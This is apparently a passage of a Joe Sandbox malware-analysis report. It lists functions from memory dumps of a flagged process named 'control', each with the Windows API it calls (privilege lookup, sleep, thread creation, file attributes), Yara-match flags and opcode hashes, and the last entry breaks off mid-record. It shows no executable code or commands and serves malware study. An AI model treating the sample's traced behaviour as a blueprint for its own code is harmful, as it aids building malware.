                                                                                                                                                                                                                                                                                                Function 01099FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8f3cb8c88e5fad52bc92ff35aadf1e75ed0da61ff45b88b177899afb23d1e496
                                                                                                                                                                                                                                                                                                • Instruction ID: b5333861030d24e7c2e9d4837228a988900c2eb908d978b64b20fb5a4551d30b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f3cb8c88e5fad52bc92ff35aadf1e75ed0da61ff45b88b177899afb23d1e496
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B90027131114912D11061D9C4047061105A7D1241FD1C411A0C14598DCAD588917262
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 35f6d8c2e0e441113876ceee0f415eebd945279a81e3f3a70b0f1b534dca0075
                                                                                                                                                                                                                                                                                                • Instruction ID: 9b344e99b8081ebf95bb288805d596e82b6ae156633616f5ac2a37d500b8354a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35f6d8c2e0e441113876ceee0f415eebd945279a81e3f3a70b0f1b534dca0075
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A890027160500D12D15071D984147461105A7D0341FD1C011A0414694DCB958A5577E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c09de8dba1902356fe2db57954efcf0dbe3ee13d56fcdb1b9fe0ac061b4b895d
                                                                                                                                                                                                                                                                                                • Instruction ID: 03848604723968375012739360d2a8fa4ea7808a55ea572e0f1e2e8b2eb982bf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c09de8dba1902356fe2db57954efcf0dbe3ee13d56fcdb1b9fe0ac061b4b895d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0990027120504D52D14071D98404A461115A7D0345FD1C011A04546D4DDA658D55B7A1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0a9add71f5f661fc794ca4a3ffb2adf586e176e171514fcaf1471deb283167a5
                                                                                                                                                                                                                                                                                                • Instruction ID: f3dbf8f7e16076d6bcfb85cbcccaa49b47a243abfffb2f1b0892f4f6cd06f2f1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a9add71f5f661fc794ca4a3ffb2adf586e176e171514fcaf1471deb283167a5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0490026121180552D20065E98C14B071105A7D0343FD1C115A0544594CCD5588616661
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01099660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e992dd9d19beeeb10062b9a2670136354475db4c6de158b34eb49c12b11c82d8
                                                                                                                                                                                                                                                                                                • Instruction ID: 577d6c93e703d1c9fa0c69ee0068d368421fb464a34ff48cf6ec3162e4361eb5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e992dd9d19beeeb10062b9a2670136354475db4c6de158b34eb49c12b11c82d8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA90027120100D12D18071D9840464A1105A7D1341FD1C015A0415694DCE558A5977E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 010996D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c7554d145dfa40f535ba95572c0a81cb3e200cc69dcef95ce6029b4c12777a73
                                                                                                                                                                                                                                                                                                • Instruction ID: 62c607a2a7ca9d1ef782cf5ba7352f49ca4f8c3779b359530c8dc7bd35d35615
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7554d145dfa40f535ba95572c0a81cb3e200cc69dcef95ce6029b4c12777a73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F90027120100D52D10061D98404B461105A7E0341FD1C016A0514694DCA55C8517661
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 010996E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a6b7f92c5552c80e1b3eaaa126c4b915bcdd80e8283b40e15118db83bf2db271
                                                                                                                                                                                                                                                                                                • Instruction ID: 18fff2ad34053bd52854c1b55d10c397d85d71d6b63a73d92d69f49208c760ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6b7f92c5552c80e1b3eaaa126c4b915bcdd80e8283b40e15118db83bf2db271
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C390027120108D12D11061D9C40474A1105A7D0341FD5C411A4814698DCAD588917261
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050CBC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,O,004FE0E2,?,00000000,?,?), ref: 0050CC00
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                • String ID: ~"PT$O
                                                                                                                                                                                                                                                                                                • API String ID: 3899507212-2197653313
                                                                                                                                                                                                                                                                                                • Opcode ID: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                                                                                                                                                                                                                                                • Instruction ID: 668021ccc5701074a3a27894b33ff974399024f0b8c5b833228deff9da4819a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E016DB52002086FDB14DF98DC45EEB37ADAF89754F054559FE0957242C230E811CBF1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050B4B0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 0050B56B
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                                                • Opcode ID: 740bb919a93c88178504d7657f6936b8f6d9be3e01384b2bfbbca6322cd5bae7
                                                                                                                                                                                                                                                                                                • Instruction ID: 9b02479f343b368a6c54af89875f66137f59d66dc52f1380d726cd8a2902db29
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 740bb919a93c88178504d7657f6936b8f6d9be3e01384b2bfbbca6322cd5bae7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2631ADB5600608ABD714DFA4D8C5FAABBE8FB88700F14855EF65D5B285D770B540CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050B4A4 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 0050B56B
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                                                • Opcode ID: 5e71689139c1fb183bdad0395386824fd6e853b64541a9c13edcdc47c246473b
                                                                                                                                                                                                                                                                                                • Instruction ID: 342889125126b8554fbfc19af968911ed8493288053d52ecd9c50caf244cbf13
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e71689139c1fb183bdad0395386824fd6e853b64541a9c13edcdc47c246473b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B731AFB1A00604ABE714DFA5D8C5FAAFBF8FF88700F10855AE65D5B285E770B544CBA0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004FFCA0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 004FFDC3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-2766056989
                                                                                                                                                                                                                                                                                                • Opcode ID: 017e714e9166132bfbe23960c7f83526e4417b449f7f6e0a8e11971c4735c4fd
                                                                                                                                                                                                                                                                                                • Instruction ID: 09aeb5ccbf59f95e9ed7874125d3852e9c881d2d5486def207f1651f0f247bd9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 017e714e9166132bfbe23960c7f83526e4417b449f7f6e0a8e11971c4735c4fd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D57182B1900209ABD714DB64CC86EFFB77CFF94304F144D9EB61997181EB74AA848BA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050B5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,lZB,00000000,00000000,004FDDA2,?,?,?,425AE56C,?), ref: 0050B632
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                                                • String ID: lZB
                                                                                                                                                                                                                                                                                                • API String ID: 2422867632-878811233
                                                                                                                                                                                                                                                                                                • Opcode ID: b4e5e481b2f2be6e955226239919ef9d20dbf72cf6c271fe4d2a11252b7bcdce
                                                                                                                                                                                                                                                                                                • Instruction ID: 82b78543ee891302bad468b3bb31ea2cc0418a15af35be38b877e58a1d88d44b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e5e481b2f2be6e955226239919ef9d20dbf72cf6c271fe4d2a11252b7bcdce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2F0657378160436E33061AAAC02FDB769CDBC4B61F140025F70CEA1C1D996B44146E8
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050B5ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31threadCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,lZB,00000000,00000000,004FDDA2,?,?,?,425AE56C,?), ref: 0050B632
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                                                • String ID: lZB
                                                                                                                                                                                                                                                                                                • API String ID: 2422867632-878811233
                                                                                                                                                                                                                                                                                                • Opcode ID: 55a70b099f56c8d257234121492cb2f52a547a1a7c989453f00d7cd532cc45df
                                                                                                                                                                                                                                                                                                • Instruction ID: f0e15f6729afd4cfcadf630a4c899a67b066d47caacf1d2012cc9ec43c04bbe9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a70b099f56c8d257234121492cb2f52a547a1a7c989453f00d7cd532cc45df
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6E0927368070836F73062A59C03FDB6A999BC4B10F140519F709AB1C1D996B44046A8
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004FE790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(2BP,?,?,00504232,00000000,?), ref: 004FE7BA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                • String ID: 2BP
                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-1904907423
                                                                                                                                                                                                                                                                                                • Opcode ID: e5bef1997f6aeae5a4a202901e1d255b842bd680525f30c7be0e67d2bcc2f47d
                                                                                                                                                                                                                                                                                                • Instruction ID: 903dd0f2c5a66f3924f984bea296ad5d26e93945a46f27cfba037ed7305db46f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5bef1997f6aeae5a4a202901e1d255b842bd680525f30c7be0e67d2bcc2f47d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FE04F7564020926FB2466AE9C46F76339C8B48B24F184A51FA1C9B2D2D578F9418159
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050CA30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(3nP,?,005075DD,005075DD,?,00506E33,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0050CA5D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID: 3nP
                                                                                                                                                                                                                                                                                                • API String ID: 1279760036-1232704774
                                                                                                                                                                                                                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                • Instruction ID: f4230ef20d330e6e0a3f37e1690163892eac206cff02a0b07390515ad2c6c590
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59E04FB12002086BC714DF89DC45EDB37ACEF88750F018454FE095B241C570F910CAF1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050CBD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,O,004FE0E2,?,00000000,?,?), ref: 0050CC00
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                • String ID: O
                                                                                                                                                                                                                                                                                                • API String ID: 3899507212-2623078450
                                                                                                                                                                                                                                                                                                • Opcode ID: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                                                                                                                                                                                                                                                • Instruction ID: 32924e5fa085742ded64a986870c0afa860f03c30ac1bc4b3d7a9875ffe0c49a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6E01AB16002086BC714DF89DC45EEB37ADAF88650F014455BA0957242C671E8108BB1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0050521C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00505237
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                                                                                                                                                                                                • Opcode ID: e49e0eecdc898293f0cf74605bbc8c53e6bee43a0a5fda52e2f8315f62d04465
                                                                                                                                                                                                                                                                                                • Instruction ID: 709955b79621eaaad03452237202942012398d3394e63abb77d80b40ab523700
